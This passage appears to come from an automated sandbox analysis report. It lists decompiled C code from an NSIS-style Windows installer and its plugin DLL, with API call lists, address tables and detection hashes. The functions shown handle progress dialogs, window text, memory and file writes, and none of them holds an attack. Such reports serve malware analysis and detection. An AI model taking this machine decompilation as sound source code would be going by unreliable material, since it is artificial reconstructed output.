							E6F711266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                0x6f7124e4
                                                                                0x6f7124e6
                                                                                0x6f7124f0
                                                                                0x6f7124f6
                                                                                0x6f712500
                                                                                0x6f712504
                                                                                0x6f712509
                                                                                0x6f712509
                                                                                0x6f712511
                                                                                0x6f712518
                                                                                0x6f71251e
                                                                                0x00000000
                                                                                0x6f712525
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71252c
                                                                                0x6f712530
                                                                                0x6f712533
                                                                                0x6f712537
                                                                                0x6f71253e
                                                                                0x6f712542
                                                                                0x6f712548
                                                                                0x6f71254a
                                                                                0x6f71254c
                                                                                0x6f71254c
                                                                                0x6f712553
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71255c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71256c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712598
                                                                                0x6f7125a0
                                                                                0x6f7125aa
                                                                                0x6f7125ac
                                                                                0x6f7125b1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712574
                                                                                0x6f712578
                                                                                0x6f71257a
                                                                                0x6f71257b
                                                                                0x6f71257d
                                                                                0x6f71258d
                                                                                0x6f712594
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7125b7
                                                                                0x6f7125b9
                                                                                0x6f7125bf
                                                                                0x6f7125c5
                                                                                0x6f7125c5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71251e
                                                                                0x6f7125c8
                                                                                0x6f7125c8
                                                                                0x6f7125cd
                                                                                0x6f7125de
                                                                                0x6f7125de
                                                                                0x6f7125e4
                                                                                0x6f7125e9
                                                                                0x6f7125ee
                                                                                0x6f7125fa
                                                                                0x6f7125ff
                                                                                0x00000000
                                                                                0x6f712604
                                                                                0x6f7125f0
                                                                                0x6f7125f1
                                                                                0x6f712605
                                                                                0x6f712605
                                                                                0x6f7125ee
                                                                                0x6f712606
                                                                                0x6f71260a
                                                                                0x6f71260d
                                                                                0x6f712625

                                                                                APIs
                                                                                  • Part of subcall function 6F711215: GlobalAlloc.KERNELBASE(00000040,6F711233,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F71121D
                                                                                • GlobalFree.KERNEL32 ref: 6F7125DE
                                                                                • GlobalFree.KERNEL32 ref: 6F712618
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                • Opcode ID: 1cf8d309645a1f638307f009b96f24039011138ba7b45cfbd877155382e0fcde
                                                                                • Instruction ID: edd5504ef34d8b1e1817ca2193d1ee4ed2c03917ed312cebcbe9468761785571
                                                                                • Opcode Fuzzy Hash: 1cf8d309645a1f638307f009b96f24039011138ba7b45cfbd877155382e0fcde
                                                                                • Instruction Fuzzy Hash: 35418D72108600AFDB01CF64CED9C2A7BBAEB87314B1846BAF5419A150D731A91CDB71
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                0x0040537a
                                                                                0x00405386
                                                                                0x00405389
                                                                                0x0040538f
                                                                                0x0040539b
                                                                                0x0040539e
                                                                                0x004053a1
                                                                                0x004053a7
                                                                                0x004053a7
                                                                                0x004053ad
                                                                                0x004053b5
                                                                                0x004053b8
                                                                                0x004053d5
                                                                                0x004053d9
                                                                                0x004053e2
                                                                                0x004053e2
                                                                                0x004053ec
                                                                                0x004053f5
                                                                                0x00405401
                                                                                0x00405408
                                                                                0x0040540c
                                                                                0x0040540f
                                                                                0x00405422
                                                                                0x00405430
                                                                                0x00405430
                                                                                0x00405434
                                                                                0x00405436
                                                                                0x00405439
                                                                                0x00000000
                                                                                0x00405439
                                                                                0x004053ba
                                                                                0x004053c2
                                                                                0x004053ca
                                                                                0x004053d0
                                                                                0x00000000
                                                                                0x004053d0
                                                                                0x004053ca
                                                                                0x004053b8
                                                                                0x00405443

                                                                                APIs
                                                                                • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 2531174081-0
                                                                                • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                0x00402e5e
                                                                                0x00402e60
                                                                                0x00402e67
                                                                                0x00402e6a
                                                                                0x00402e6a
                                                                                0x00402e70
                                                                                0x00000000
                                                                                0x00402e70
                                                                                0x00402e7e
                                                                                0x00000000
                                                                                0x00402e81
                                                                                0x00402e88
                                                                                0x00402e94
                                                                                0x00402e9c
                                                                                0x00402eda
                                                                                0x00402ee3
                                                                                0x00000000
                                                                                0x00402ee8
                                                                                0x00402ea5
                                                                                0x00402eb6
                                                                                0x00000000
                                                                                0x00402ec4
                                                                                0x00402ea5
                                                                                0x00402ef0

                                                                                APIs
                                                                                • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                                • GetTickCount.KERNEL32 ref: 00402E88
                                                                                • wsprintfA.USER32 ref: 00402EB6
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                  • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                  • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                  • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                  • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                  • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                • String ID: ... %d%%
                                                                                • API String ID: 722711167-2449383134
                                                                                • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                0x00404c32
                                                                                0x00404c3f
                                                                                0x00404c45
                                                                                0x00404c83
                                                                                0x00404c83
                                                                                0x00404c92
                                                                                0x00404c99
                                                                                0x00000000
                                                                                0x00404c9b
                                                                                0x00404c47
                                                                                0x00404c56
                                                                                0x00404c5e
                                                                                0x00404c61
                                                                                0x00404c73
                                                                                0x00404c79
                                                                                0x00404c80
                                                                                0x00000000
                                                                                0x00404c80
                                                                                0x00000000

                                                                                APIs
                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
                                                                                • GetMessagePos.USER32 ref: 00404C47
                                                                                • ScreenToClient.USER32 ref: 00404C61
                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Message$Send$ClientScreen
                                                                                • String ID: f
                                                                                • API String ID: 41195575-1993550816
                                                                                • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                0x00402dc7
                                                                                0x00402dd5
                                                                                0x00402ddb
                                                                                0x00402ddb
                                                                                0x00402de9
                                                                                0x00402deb
                                                                                0x00402df7
                                                                                0x00402dfc
                                                                                0x00402dfe
                                                                                0x00402dfe
                                                                                0x00402e09
                                                                                0x00402e19
                                                                                0x00402e2b
                                                                                0x00402e2b
                                                                                0x00402e33

                                                                                APIs
                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                • wsprintfA.USER32 ref: 00402E09
                                                                                • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                • SetDlgItemTextA.USER32 ref: 00402E2B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                • API String ID: 1451636040-1158693248
                                                                                • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 6F7122F1, Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 86%
                                                                                			E6F7122F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E6F7112AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E6F71123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M6F71247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E6F7112FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E6F7112FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E6F711224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x6f71405c =  *0x6f71405c +  *0x6f71405c;
									__edi = GlobalAlloc(0x40,  *0x6f71405c +  *0x6f71405c);
									 *0x6f71405c = MultiByteToWideChar(0, 0, __ebx,  *0x6f71405c, __edi,  *0x6f71405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E6F7112FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x6f71405c;
									__esi = __esi +  *0x6f714064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E6F711429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E6F711224(0x6f714034);
					goto L10;
				}
			}












                                                                                0x6f712306
                                                                                0x6f71230a
                                                                                0x6f712315
                                                                                0x6f712315
                                                                                0x6f71231c
                                                                                0x6f712321
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712325
                                                                                0x6f712328
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71232d
                                                                                0x6f712338
                                                                                0x6f712348
                                                                                0x6f71233f
                                                                                0x6f712341
                                                                                0x6f712357
                                                                                0x6f712357
                                                                                0x00000000
                                                                                0x6f71232f
                                                                                0x6f71232f
                                                                                0x6f712358
                                                                                0x6f71235c
                                                                                0x6f71235e
                                                                                0x6f71235e
                                                                                0x6f712361
                                                                                0x6f712361
                                                                                0x6f712369
                                                                                0x6f71236c
                                                                                0x6f712373
                                                                                0x6f712377
                                                                                0x6f712446
                                                                                0x6f712447
                                                                                0x6f712452
                                                                                0x6f71247d
                                                                                0x6f71247d
                                                                                0x6f712462
                                                                                0x6f71246e
                                                                                0x6f712464
                                                                                0x6f712464
                                                                                0x6f712464
                                                                                0x00000000
                                                                                0x6f71237d
                                                                                0x6f71237d
                                                                                0x00000000
                                                                                0x6f712384
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71238d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71239b
                                                                                0x6f71239e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7123a7
                                                                                0x6f7123ac
                                                                                0x6f7123af
                                                                                0x6f7123b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f7123bd
                                                                                0x6f7123c8
                                                                                0x6f7123d7
                                                                                0x6f7123e2
                                                                                0x6f712405
                                                                                0x6f712408
                                                                                0x6f7123e4
                                                                                0x6f7123e8
                                                                                0x6f7123ee
                                                                                0x6f7123ef
                                                                                0x6f7123f2
                                                                                0x6f7123f3
                                                                                0x6f7123f6
                                                                                0x6f7123fd
                                                                                0x6f7123fd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712410
                                                                                0x6f712413
                                                                                0x6f71241f
                                                                                0x6f712421
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f712424
                                                                                0x6f712427
                                                                                0x6f712428
                                                                                0x6f71242f
                                                                                0x6f712436
                                                                                0x6f712439
                                                                                0x6f71243b
                                                                                0x6f71243e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x6f71237d
                                                                                0x6f712377
                                                                                0x6f71234d
                                                                                0x6f712352
                                                                                0x00000000
                                                                                0x6f712352

                                                                                APIs
                                                                                • GlobalFree.KERNEL32 ref: 6F712447
                                                                                  • Part of subcall function 6F711224: lstrcpynA.KERNEL32(00000000,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F711234
                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6F7123C2
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6F7123D7
                                                                                • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6F7123E8
                                                                                • CLSIDFromString.OLE32(00000000,00000000), ref: 6F7123F6
                                                                                • GlobalFree.KERNEL32 ref: 6F7123FD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3730416702-0
                                                                                • Opcode ID: 57e45122058362e87ab64e55f096532d23c51fe4c4d92f71a568adab3af06fd7
                                                                                • Instruction ID: 909af7875d698f337aeadbea0f763fcd9ceeed95471d3517e5f835f4887de97e
                                                                                • Opcode Fuzzy Hash: 57e45122058362e87ab64e55f096532d23c51fe4c4d92f71a568adab3af06fd7
                                                                                • Instruction Fuzzy Hash: A6419DB150C341DFD710CF649A45B6AB7F8FF82325F084AAEE845CA190D770A95CCBA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 93%
                                                                                			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C52(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405DC1(_t50);
				_t26 = E00405DE6(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42f458;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040343E(_t45);
						E00403428(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E004031B7(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405DA1( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E8D( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E004031B7(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                                0x004027df
                                                                                0x004027e1
                                                                                0x004027ed
                                                                                0x004027f0
                                                                                0x004027fa
                                                                                0x004027fe
                                                                                0x004027fe
                                                                                0x00402804
                                                                                0x00402811
                                                                                0x00402819
                                                                                0x0040281c
                                                                                0x00402822
                                                                                0x00402830
                                                                                0x00402835
                                                                                0x00402839
                                                                                0x0040283c
                                                                                0x00402845
                                                                                0x00402851
                                                                                0x00402855
                                                                                0x00402858
                                                                                0x00402862
                                                                                0x00402887
                                                                                0x00402869
                                                                                0x0040286e
                                                                                0x00402876
                                                                                0x0040287c
                                                                                0x00402881
                                                                                0x00402881
                                                                                0x0040288e
                                                                                0x0040288e
                                                                                0x0040289b
                                                                                0x004028a1
                                                                                0x004028b3
                                                                                0x004028b3
                                                                                0x004028b9
                                                                                0x004028b9
                                                                                0x004028c4
                                                                                0x004028c5
                                                                                0x004028c9
                                                                                0x004028cd
                                                                                0x004028d3
                                                                                0x004028d3
                                                                                0x004028da
                                                                                0x004022dd
                                                                                0x00402a5d
                                                                                0x00402a69

                                                                                APIs
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                • GlobalFree.KERNEL32 ref: 0040288E
